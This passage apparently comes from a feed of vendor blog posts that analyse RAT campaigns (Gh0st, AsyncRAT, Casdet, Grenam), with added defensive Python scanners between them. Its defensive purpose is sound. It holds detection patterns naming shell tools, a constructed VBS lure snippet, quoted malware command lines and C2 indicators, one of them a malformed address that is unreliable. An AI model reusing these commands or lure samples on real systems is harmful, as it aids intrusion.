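def suspicious_exclusions(text):
    """Return (kind, exclusion) pairs that deserve review; kind is paths or processes."""
    flagged = []
    for key, name, _data in parse_reg_query(text):
        kind = key.rsplit("\\", 1)[-1].lower()
        if kind == "paths" and USER_WRITABLE.match(name):
            flagged.append((kind, name))
        elif kind == "processes" and (USER_WRITABLE.match(name) or "\\" not in name):
            # A bare file name excludes that process wherever it runs from
            flagged.append((kind, name))
    return flagged


def query_live():
    """On Windows, run `reg query` for both keys and return the combined text."""
    chunks = []
    for key in EXCLUSION_KEYS:
        proc = subprocess.run(["reg", "query", key], capture_output=True, text=True)
        if proc.returncode == 0:          # non-zero means the key does not exist
            chunks.append(proc.stdout)
    return "\n".join(chunks)


# Constructed sample of what `reg query` prints; the path names are invented.
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
    C:\Program Files\Example Backup    REG_DWORD    0x0
    C:\Users\alice\AppData\Roaming\Registry Workshop    REG_DWORD    0x0
    C:\Temp    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
    C:\Program Files\Example Backup\backup.exe    REG_DWORD    0x0
    svchost.exe    REG_DWORD    0x0
"""

if __name__ == "__main__":
    text = query_live() if sys.platform == "win32" else SAMPLE_OUTPUT
    for kind, entry in suspicious_exclusions(text):
        print(f"[{kind}] {entry}")
```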

Gh0st RAT is delivered in encrypted form disguised as a Registry Workshop. In addition to providing remote access, it can collect information (keylogging, screen capturing, etc.). Moreover, it contains an embedded rootkit that allows it to hide certain system elements, such as the registry or directories.

It can also drop Mimikatz into the system folder, enable RDP on compromised hosts, gain access to account identifiers associated with Tencent QQ, clear Windows event logs, and erase data from 360 Secure Browser, QQ Browser, and Sogou Explorer.

It is rather unusual to see malware of allegedly Chinese origin attacking users in mainland China. Threat actors typically avoid attacking anything or anyone within their own country, since that brings law enforcement uncomfortably close. The thing is, this is not just regular malware but a toolkit for spying on citizens, and APT27 has been seen doing exactly this to Chinese citizens before, both on the mainland and in Taiwan.

How to protect your system?

Staged, multi-component attacks like this one require advanced security software to defend against. Besides strong real-time and database-backed protection, it should also include a network protection system that can filter out phishing sites like the one used in this campaign. All of this is available in GridinSoft Anti-Malware – check it out through the banner below.

AsyncRAT Spreads As Fake eBook Files, Uses LNK Files
https://gridinsoft.com/blogs/asyncrat-spreads-as-fake-ebook-files/
Wed, 10 Jul 2024 21:15:46 +0000

The post AsyncRAT Spreads As Fake eBook Files, Uses LNK Files appeared first on Gridinsoft Blog.

Recent research uncovers a new spreading campaign of AsyncRAT that targets users who download electronic books. The campaign reviewed here targets people looking for a specific book, originally available as a paid workbook on several platforms. Tricked into clicking the downloaded file, they in fact trigger the malware installation.

AsyncRAT Spreads in Fake eBook Files

The latest spreading campaign of AsyncRAT was described by Gridinsoft analysts. Fraudulent actors publish what looks like a download link for an archive containing the desired book. As I’ve mentioned, the specific book this website offers is not free, which adds even more to the temptation. After hitting the download button, the user sees a genuine-looking file and clicks it, hoping to open the book.

Actual contents of the fake eBook file – script that runs the payload

But contrary to expectation, nothing ever happens. This file is only made to look like an eBook; in fact it is a disguised compressed file that triggers the chain of malicious events. Should the user click on it, the file executes its script, launching a multi-stage malware loader. All the resources needed for the attack (except the final payload) are stored in this very fake eBook file.

Malware files that are kept inside of the “ebook file”

The first component to run is a PowerShell script that checks the system for antivirus software. It then works with the other files in the archive, which only look like video files: they carry video extensions but are in fact VBS scripts. This first script collects system information and runs another VBS file, which eventually downloads AsyncRAT from the command server. Yet another script creates a task in Task Scheduler and executes the final payload.
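A scanner for the disguise tricks used in this chain (a shortcut hidden behind an eBook name, VBS scripts carrying video extensions), added here as an example and not code from the article or from Gridinsoft; the archive, its member names and their contents are constructed.

```python
"""Flag archive members whose content does not match their extension.

Added example for this post, not code from the article or from Gridinsoft.
The chain described above hides a shortcut (LNK) behind an eBook name and
VBS scripts behind video extensions. This scanner opens a ZIP, reads the
first bytes of each member and reports members whose name claims one format
while the bytes say another. The sample archive is built in memory; every
file name and content in it is invented.
"""
import io
import re
import zipfile

# Extensions a lure pretends to be: these should hold binary media/documents,
# never readable script text.
MEDIA_EXT = {".mp4", ".avi", ".mkv", ".mov", ".pdf", ".epub"}
SCRIPT_EXT = {".lnk", ".vbs", ".vbe", ".js", ".jse", ".bat", ".cmd", ".ps1", ".exe", ".scr"}
# Shell Link files start with the header size 0x4C and the ShellLink CLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c0000000" "00000046")
SCRIPT_HINT = re.compile(
    rb"(?i)(CreateObject|WScript\.Shell|Shell\.Application|powershell|"
    rb"Invoke-Expression|cmd(\.exe)?\s*/c|ShellExecute)"
)
DOUBLE_EXT = re.compile(r"\.(pdf|epub|mp4|avi|mkv|mov|docx?)\.([a-z0-9]{2,4})$", re.I)


def _ext(name):
    dot = name.lower().rfind(".")
    return name.lower()[dot:] if dot >= 0 else ""


def classify(name, head):
    """Return the reasons why member `name` with leading bytes `head` looks disguised."""
    reasons = []
    ext = _ext(name)
    m = DOUBLE_EXT.search(name)
    if m and "." + m.group(2).lower() in SCRIPT_EXT:
        reasons.append("double-extension")            # book.pdf.lnk
    if head.startswith(LNK_MAGIC) and ext != ".lnk":
        reasons.append("lnk-in-disguise")             # shortcut named like a document
    if ext in MEDIA_EXT:
        is_text = all(32 <= b < 127 or b in (9, 10, 13) for b in head)
        if is_text and SCRIPT_HINT.search(head):
            reasons.append("script-in-disguise")      # VBS bytes under a video extension
    return reasons


def scan_zip(data, head_len=512):
    """Scan every member of an in-memory ZIP; map member name -> reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(head_len)
            reasons = classify(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive():
    """Construct a lure archive modelled on the campaign; all contents invented."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Shortcut posing as the book; the double extension hides the .lnk
        zf.writestr("Workbook_2024.pdf.lnk", LNK_MAGIC + b"\x00" * 64)
        # VBS script carrying a video extension
        zf.writestr("intro.mp4", b'Set sh = CreateObject("WScript.Shell")\r\n'
                                 b'sh.Run "wscript.exe part2.mp4"\r\n')
        # Genuine-looking MP4: 4-byte box size followed by the ftyp box
        zf.writestr("chapter1.mp4", b"\x00\x00\x00\x18ftypmp42" + b"\x00" * 32)
        zf.writestr("readme.txt", b"Enjoy the book!\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_archive()).items():
        print(f"{member}: {', '.join(reasons)}")
```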

What is AsyncRAT?

AsyncRAT is an open-source remote access tool that first appeared publicly in 2019. For obvious reasons, it is often weaponized by malicious actors. Even in its original design, it is a powerful toolkit for remote access and administration, using encrypted connections during the session. AsyncRAT is capable of logging keystrokes, sending remote commands, controlling the attacked system and deploying malware.

As the source code is freely available, it is nearly impossible to trace its use back to a specific cybercrime gang. In fact, AsyncRAT appears both in attacks on individuals and in high-profile cyberattacks led by state-sponsored actors. Its open-source nature also adds to the flexibility of the payload: functionality, detection evasion, capabilities for delivering other malware – operators can alter pretty much anything. This is what makes not only AsyncRAT, but any open-source malware, exceptionally dangerous.

How to protect against malware?

To stop an obfuscated malware-spreading campaign like the one I’ve described above, I recommend using GridinSoft Anti-Malware. Its multi-component detection system will stop the attack even before the malicious file reaches the system, thanks to its superior online protection module.

How to Remove Trojan:Win32/Casdet!rfn from Windows 11
https://gridinsoft.com/blogs/trojan-win32-casdet-rfn/
Thu, 27 Jun 2024 14:33:20 +0000

The post How to Remove Trojan:Win32/Casdet!rfn from Windows 11 appeared first on Gridinsoft Blog.

Your antivirus just detected Trojan:Win32/Casdet!rfn on your computer. Your system is running slower than usual. The CPU fan won’t stop spinning. You see unknown processes consuming system resources. Strange DLL files are appearing in temporary folders.

This comprehensive guide shows you exactly how to remove this sophisticated threat. We’ll cover both manual removal techniques and automatic solutions. Let’s start with what you need to know about this dangerous malware.

Detection Name       Trojan:Win32/Casdet!rfn
Threat Type          Remote Access Trojan (RAT) / Modular Malware Downloader
Primary Function     System reconnaissance, payload delivery, data theft, backdoor access
Persistence Method   WerFault.exe abuse, registry modification, scheduled tasks
Common Sources       Phishing emails, cracked software, P2P networks, malicious attachments
Evasion Techniques   Obfuscation, virtual machine detection, geofencing, process injection
Data Collected       OS version, username, CPU/GPU info, IP address, installed software
Payload Delivery     DLL execution via rundll32.exe, modular architecture
Risk Level           High – Can deploy ransomware, stealers, and other malware

Trojan:Win32/Casdet!rfn Virus Detection

What is Trojan:Win32/Casdet!rfn?

Casdet is a sophisticated remote access trojan that works primarily as a malware downloader. It creates a backdoor into your computer and delivers additional malicious payloads. The malware can steal your personal information and give cybercriminals remote control over your system.

Sometimes Casdet shows up as a false positive detection. This happens when you download legitimate software like Android emulators or game mods. But most of the time, it’s a real threat that needs immediate removal.

The trojan is part of a broader category of trojan malware that can cause serious damage. What makes Casdet particularly dangerous is its modular structure, which allows it to adapt and perform different malicious functions.

How Casdet Operates

Understanding how Casdet works helps you remove it more effectively. This malware follows a specific pattern of infection and operation.

Initial Infection and Evasion

Casdet typically arrives through phishing emails or bundled with cracked software. Once on your system, it immediately begins applying evasion techniques:

  • Detection Evasion: Uses obfuscation techniques to hide from antivirus
  • Environment Checks: Scans for virtual machines and debuggers
  • Geofencing: Checks system language to avoid certain countries
  • Idle Time: Waits several minutes before executing to avoid detection

The malware specifically checks these registry keys to determine your system’s language and location:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
  • HKCU\Software\Classes\Local Settings\MuiCache\130\52C64B7E\LanguageList

System Fingerprinting and Persistence

After initial checks, Casdet collects information about your system. This creates a unique fingerprint that gets sent to the command servers:

  • Operating system version and architecture
  • Username and computer name
  • CPU and GPU specifications
  • Display resolution and device vendor
  • IP address and network information
  • List of installed software

For persistence, Casdet abuses the Windows Error Reporting service by executing this command:

C:\Windows\system32\WerFault.exe -u -p 3560 -s 216

This technique allows the malware to maintain access even after system reboots, similar to methods used by other advanced trojans.

Command and Control Communication

Casdet communicates with multiple command and control (C2) servers, reaching them over IP addresses hardcoded into the malware binary.


The malware encrypts its communications and can receive various commands from these servers, including instructions to download and execute additional malware.

Payload Delivery Mechanism

This is where Casdet becomes extremely dangerous. It can deploy virtually any type of malware:

  • Ransomware that encrypts your files
  • Information stealers that harvest passwords and personal data
  • Cryptocurrency miners that slow down your system
  • Additional backdoors for persistent access

Casdet executes payloads using this technique:

"C:\Windows\System32\rundll32.exe" C:\Users\[Username]\AppData\Local\Temp\[random_name].dll,DllMain

This method makes detection harder because it uses legitimate Windows processes to run malicious code.
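A triage routine for the two execution patterns above (WerFault.exe running outside the system directories, and rundll32.exe loading a Temp-folder DLL through DllMain), added here as an example and not code from the article or from Gridinsoft. The process events are constructed; the user name and the parent programs are invented, and the DLL name reuses the example name given in the removal steps.

```python
r"""Triage process-creation events for the Casdet execution patterns above.

Added example for this post, not code from the article or from Gridinsoft.
It takes process-creation records with the fields Sysmon Event ID 1 or
Security Event ID 4688 provide (image path and command line) and flags:
  * WerFault.exe started from anywhere other than System32/SysWOW64, the
    location check the removal steps rely on;
  * rundll32.exe loading a DLL from a user's Temp folder and calling DllMain
    directly, the payload-delivery command quoted above.
All sample events are constructed for this example.
"""
import re
from dataclasses import dataclass

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# rundll32 takes "<dll path>,<export>"; capture both parts.
RUNDLL_ARG = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^\s",]+\.dll)"?\s*,\s*(?P<export>\w+)', re.I
)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
HEX_NAME = re.compile(r"^[0-9a-f]{16,}\.dll$", re.I)


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # its command line


def _norm(path):
    return path.strip('"').lower()


def check_werfault(ev):
    """Flag WerFault.exe images outside the Windows system directories."""
    img = _norm(ev.image)
    if not img.endswith("\\werfault.exe") or img.startswith(SYSTEM_DIRS):
        return None
    return f"WerFault.exe running from non-system path: {ev.image}"


def check_rundll32(ev):
    """Flag rundll32 loads of Temp-folder, hex-named DLLs via DllMain."""
    if not _norm(ev.image).endswith("\\rundll32.exe"):
        return None
    m = RUNDLL_ARG.search(ev.command_line)
    if not m:
        return None
    dll, export = m.group("dll"), m.group("export")
    reasons = []
    if TEMP_DIR.search(dll):
        reasons.append("DLL loaded from user Temp folder")
    if export.lower() == "dllmain":
        reasons.append("DllMain called directly as the export")
    if HEX_NAME.match(dll.rsplit("\\", 1)[-1]):
        reasons.append("random hex-looking DLL name")
    return f"rundll32 {dll},{export}: " + "; ".join(reasons) if reasons else None


CHECKS = (check_werfault, check_rundll32)


def triage(events):
    """Return (event index, finding) pairs for every event that trips a check."""
    findings = []
    for i, ev in enumerate(events):
        for chk in CHECKS:
            msg = chk(ev)
            if msg:
                findings.append((i, msg))
    return findings


SAMPLE_EVENTS = [
    # WerFault.exe from its genuine location with the arguments quoted above;
    # the path check stays quiet here
    ProcessEvent(r"C:\Windows\System32\WerFault.exe",
                 r"C:\Windows\system32\WerFault.exe -u -p 3560 -s 216"),
    # A masqueraded copy in a user-writable folder (constructed)
    ProcessEvent(r"C:\Users\alice\AppData\Roaming\WerFault.exe",
                 r"C:\Users\alice\AppData\Roaming\WerFault.exe -u -p 3560 -s 216"),
    # The payload-delivery pattern from the post (user name constructed)
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r'"C:\Windows\System32\rundll32.exe" '
                 r"C:\Users\alice\AppData\Local\Temp\e8442b7f12ab7cb616c549181d39c10b.dll,DllMain"),
    # Benign rundll32 use: a system DLL with a named export
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```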

Signs Your Computer is Infected

You might notice these symptoms if Casdet is on your computer:

  • Computer runs slower than usual
  • High CPU usage from unknown processes
  • Strange files in temporary folders
  • Antivirus detection alerts
  • Network activity when you’re not using the internet
  • System freezes or crashes
  • Browser redirects to suspicious websites

These symptoms are similar to those of other information-stealing malware we’ve analyzed before.

Manual Removal Steps

You can remove Casdet manually by following these steps. The process takes time, but it’s effective. Make sure to follow each step carefully.

Step 1: Preparation

First, you need to prepare your system for the removal process. This helps prevent the malware from interfering with your cleanup efforts.

  1. Disconnect your computer from the internet
  2. Boot your computer in Safe Mode
  3. Create a backup of important files (scan them first)
  4. Close all running programs

Safe Mode prevents most malware from running. This makes removal easier and safer.

Step 2: Identify Malicious Processes

Next, you need to find the malicious processes running on your system. Casdet often disguises itself as legitimate Windows processes.

  1. Press Ctrl + Shift + Esc to open Task Manager
  2. Click on the “Processes” tab
  3. Look for suspicious processes with high CPU usage
  4. Check for processes named “WerFault.exe” running from unusual locations
  5. Right-click suspicious processes and select “End Task”

Be careful not to end legitimate Windows processes. When in doubt, research the process name online first.

Step 3: Delete Malicious Files

Now you need to find and delete the malware files. Casdet typically hides in these locations:

  1. Navigate to C:\Users\[Username]\AppData\Local\Temp\
  2. Look for DLL files with random names (like “e8442b7f12ab7cb616c549181d39c10b.dll”)
  3. Delete any suspicious files you find
  4. Check C:\Windows\System32\ for modified WerFault.exe
  5. Empty your Recycle Bin completely

Similar to other trojan variants, Casdet uses temporary folders to hide its files.

Step 4: Clean Startup Programs

Remove the malware from your startup programs to prevent it from running when Windows starts:

  1. Press Win + R to open the Run dialog
  2. Type “msconfig” and press Enter
  3. Click on the “Startup” tab
  4. Look for suspicious entries
  5. Uncheck any suspicious startup items
  6. Click “Apply” and “OK”

You can also check the startup folder at C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.

Step 5: Registry Cleanup

Clean the Windows Registry to remove malware entries. This is a critical step that many users skip.

  1. Press Win + R and type “regedit”
  2. Navigate to these registry keys:
     • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
     • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
     • HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\130\52C64B7E\LanguageList
  3. Delete any suspicious entries you find

Warning: Be extremely careful when editing the registry. Wrong changes can damage your system.

Step 6: Check Scheduled Tasks

Casdet might create scheduled tasks to maintain persistence. Remove these tasks:

  1. Press Win + R and type “taskschd.msc”
  2. Look through the task list for suspicious entries
  3. Right-click suspicious tasks and select “Delete”
  4. Pay attention to tasks that run random executable files

This method is also effective against similar trojan families that use persistence techniques.

Browser Cleanup

If Casdet affected your browser, you need to clean it completely. The malware might have installed malicious extensions or changed your browser settings.

Remove Malicious Browser Extensions

Google Chrome

  1. Launch the Chrome browser.
  2. Click on the icon "Configure and Manage Google Chrome" ⇢ Additional Tools ⇢ Extensions.
  3. Click "Remove" next to the extension.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Microsoft Edge

  1. Launch the Microsoft Edge browser.
  2. Click the three dots (…) menu in the top right corner.
  3. Select Extensions.
  4. Find the extension you want to remove and click Remove.
  5. Click Remove again to confirm.

Alternatively, you can type edge://extensions/ in the address bar to access the extensions page directly.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner.
  3. Select Extensions ⇢ Manage extensions.
  4. Find the extension you want to remove and click the X button next to it.
  5. Click Remove to confirm.

Alternatively, you can type opera://extensions/ in the address bar to access the extensions page directly.

Reset Your Browser

If you suspect browser-based malware components, reset your browser completely:

Google Chrome

  1. Click the three vertical dots (⋮) in the top right corner and choose Settings.
  2. Choose Reset and clean up, then Restore settings to their original defaults.
  3. Click Reset settings.

Mozilla Firefox

  1. In the upper right corner, click the three-line menu icon and choose Help.
  2. Choose More Troubleshooting Information.
  3. Choose Refresh Firefox…, then confirm with Refresh Firefox.

Microsoft Edge

  1. Click the three dots (…) menu in the top right corner.
  2. Choose Settings.
  3. Click Reset settings, then click Restore settings to their default values.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner and select Settings.
  3. Scroll down to the Advanced section in the left sidebar and click Reset and clean up.
  4. Click Restore settings to their original defaults.
  5. Click Reset settings to confirm.

Alternatively, you can type opera://settings/reset in the address bar to access reset options directly.

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of Casdet trojans. Professional anti-malware software can find hidden components and registry changes that you might miss.

GridinSoft Anti-Malware is specifically designed to handle advanced threats like Casdet. It can detect the malware even when it’s using obfuscation techniques to hide from basic antivirus programs.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. You can adjust the action the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects, and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

How to Prevent Future Infections

Preventing Casdet infections is easier than removing them. Follow these simple steps to protect your computer:

Avoid Suspicious Downloads

Casdet often comes with cracked software and pirated games. Stick to official software sources. Cracked games pose serious security risks that aren’t worth taking.

Be Careful with Email Attachments

Don’t open attachments from unknown senders. Even if you know the sender, verify suspicious attachments before opening them. Professional hacker email scams are becoming more sophisticated.

Keep Your System Updated

Install Windows updates regularly. Updates often include security patches that protect against malware. Enable automatic updates if possible.

Use Reliable Antivirus Software

Keep your antivirus software active and updated. Real-time protection can stop malware before it infects your system.

Enable Windows Defender

Don’t disable Windows Defender unless you have a good reason. It provides basic protection against common threats.

Frequently Asked Questions

What is Trojan:Win32/Casdet!rfn and why is it dangerous?

Casdet is a remote access trojan that gives cybercriminals control over your computer. It can steal your personal information, download additional malware, and slow down your system. The trojan is particularly dangerous because it can install other threats like cryptocurrency miners or ransomware.

How did Casdet get on my computer?

Most people get infected through phishing emails or by downloading cracked software. The malware might also come from suspicious websites or infected USB drives. Sometimes it spreads through fake system compromise emails that trick users into downloading malicious attachments.

Can I remove Casdet manually?

Yes, you can remove Casdet manually by following the steps in this guide. However, manual removal requires technical knowledge and can be time-consuming. If you’re not comfortable with these steps, use automatic removal tools instead.

Is it safe to delete WerFault.exe?

The legitimate WerFault.exe is a Windows system file that handles error reporting. However, Casdet abuses this process for malicious purposes. Only delete WerFault.exe if it’s running from unusual locations or behaving suspiciously.

How can I prevent Casdet infections?

Avoid downloading cracked software, be careful with email attachments, keep your system updated, and use reliable antivirus software. These basic security practices will protect you from most malware threats.

What if manual removal doesn’t work?

If manual removal fails, use professional anti-malware software like GridinSoft Anti-Malware. Some malware variants are too sophisticated for manual removal. Professional tools can detect and remove hidden components that manual methods might miss.

Can Casdet steal my passwords?

Yes, Casdet can be modified to steal passwords and other sensitive information. It’s part of a broader category of information stealers that target personal data. Change your passwords after removing the malware.

Will Casdet slow down my computer?

Yes, Casdet typically slows down infected computers by using system resources for malicious activities. It might also download additional malware that further degrades performance. Similar to other system processes that get compromised, infected systems often show high CPU usage.

Conclusion

Removing Trojan:Win32/Casdet!rfn requires careful attention to detail. The malware is sophisticated and can hide in multiple system locations. Manual removal works but takes time and technical knowledge.

For most users, automatic removal with GridinSoft Anti-Malware is the safer option. It can detect hidden components and clean your system completely. Remember to practice safe computing habits to prevent future infections.

Don’t ignore antivirus detections. Even if Casdet turns out to be a false positive, it’s better to be safe than sorry. Regular system scans and good security practices will keep your computer protected.


Quick Summary:

  • Casdet is a dangerous trojan that can download additional malware
  • Manual removal involves cleaning processes, files, registry, and startup programs
  • GridinSoft Anti-Malware provides automatic removal for better results
  • Prevention includes avoiding cracked software and suspicious email attachments
  • Change passwords and scan other devices after cleaning your computer

Virus:Win32/Grenam.VA!MSR
https://gridinsoft.com/blogs/virus-win32-grenam-va-msr/
Thu, 27 Jun 2024 12:38:57 +0000

The post Virus:Win32/Grenam.VA!MSR appeared first on Gridinsoft Blog.

Virus:Win32/Grenam.VA!MSR is a type of malware that can stealthily get into the system and establish remote connections. It allows attackers to access the system and remotely perform keylogging and information-gathering functions. This malware usually spreads through fake software downloads and on compromised websites.

Viruses like Grenam can be disguised as legitimate software. The specific capabilities and behaviors of the malware may differ depending on the variant. However, it is commonly associated with the delivery of other malicious software, making it a severe threat to the security and privacy of computer systems.

Virus:Win32/Grenam.VA!MSR Overview

Virus:Win32/Grenam.VA!MSR is a generic detection name used by Microsoft Defender Antivirus to identify a type of malware that belongs to the Grenam family. This family consists of backdoors and Remote Access Trojans (RATs). These types of malware are designed to provide unauthorized remote access to a target system. It is used to steal sensitive data, install malicious software, or cause other damage.

Virus:Win32/Grenam.VA!MSR detection window

Grenam malware can infiltrate a system through various methods, but the most common ones include malicious advertising and pirated software. Once the malware is installed, it uses anti-analysis and defense software evasion features to avoid detection by antivirus programs. As a result, it can remain undetected on a system for long periods, giving access to more dangerous malware.

Technical Analysis

Let’s look at one of the Virus:Win32/Grenam.VA!MSR samples to understand how it works. Once the malware enters the system, it executes initial dropper files such as C:\DllLoader.exe and C:\Documents and Settings\\Application Data\Ground.exe. Next, it runs scripts through interpreters such as Windows Script Host or PowerShell, passing them command-line arguments. It also drops and executes binaries with entirely meaningless names, like b013bf6f928a3bf40678e87d9da48f161e2e30908f98c78dfa9f2bd8cf3814d2.exe.

Moreover, some users report that their desktop wallpaper was changed after detecting this malware.

Changed wallpaper: note the text on the bottom left of the laptop’s screen.

Establishing Persistence

To ensure continuity and maintain a persistent presence on the infected machine, it requests the following privilege by calling a WinAPI function:

SE_LOAD_DRIVER_PRIVILEGE

The malware may exploit system vulnerabilities or use stolen credentials to gain higher privileges necessary for deeper system access and modification. The malware often manipulates other system settings or uses exploits to elevate privileges.

After finishing with persistence, Grenam starts rummaging through registry keys to collect information about the system. It mainly concentrates on data like the CPU, display resolution, installed programs, etc., without touching user data.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Defense Evasion

To evade detection by antivirus software and system monitoring tools, the malware employs techniques such as obfuscating its files and operations, hiding windows, and masquerading its processes. It also encodes data with XOR and RC4, modifies file attributes, and renames its files with misleading extensions.

The registry keys listed above store advanced Windows Explorer settings (hidden files, file extensions, title bar paths), system-wide policies affecting user accounts, rights, security options and system behavior, information on system services, and Shell Execute Hooks that modify Windows Shell behavior.

Command and Control

Finally, once it has the required access and control, the malware can execute actions as directed by its operators, including data exfiltration, further infections, or using the host for additional attacks. The malware opens backdoors and communicates with external servers via TCP and UDP to known bad IPs to establish control.

TCP 23.216.147.62:443
TCP 23.216.147.64:443
UDP a83f:8110:4170:706c:6963:6174:696f:6e50:53

This is a clear indicator of C2 activity. The malware also infects other executable files and may use network connections and network drives to spread to additional systems within the network environment.

How To Remove Virus:Win32/Grenam.VA!MSR?

If you are struggling with Virus:Win32/Grenam.VA!MSR, I suggest using GridinSoft Anti-Malware. This software has advanced features that can effectively find and neutralize malware from your system. In addition to removing existing threats, this solution provides long-term protection to prevent unwanted effects from other malware.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Remote Access Trojan (RAT)
https://gridinsoft.com/blogs/remote-access-trojan-meaning/
Thu, 16 May 2024 02:11:57 +0000
A Remote Access Trojan is software that allows unauthorized access to a victim’s computer or covert surveillance. Remote Access Trojans are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using bandwidth for criminal activity.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs along with a seemingly legitimate program, e.g., inside hacked games from torrents or within an email attachment. Once an attacker compromises the host system, they can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, a RAT can be deployed as a payload using exploit kits. Once successfully deployed, the RAT connects directly to the command-and-control (C&C) server the attackers control. It does so through a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

  • Use spyware and keyloggers to track the victim’s behavior
  • Gain access to sensitive data, including social security numbers and credit card information
  • View and record video from a webcam and microphone
  • Take screenshots
  • Format disks
  • Download, change or delete files
  • Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. A RAT is similar to Remote Desktop Protocol (RDP) or AnyDesk but differs in its stealth. The RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to the RAT, and it can return data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

Remote access trojan mechanism

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker gains a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, the RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Are Remote Access Trojans Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. They did so by gaining remote access to a computer authenticated in the SCADA (supervisory control and data acquisition) machines that controlled the country’s utility infrastructure. In addition, the Remote Access Trojan allowed attackers to access sensitive resources by leveraging the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to a threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because the malware typically carries many concealing features, allowing it to evade detection. In addition, RATs manage their resource utilization so that there is no noticeable performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

  • Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
  • Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
  • Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.
  • Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.
  • Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

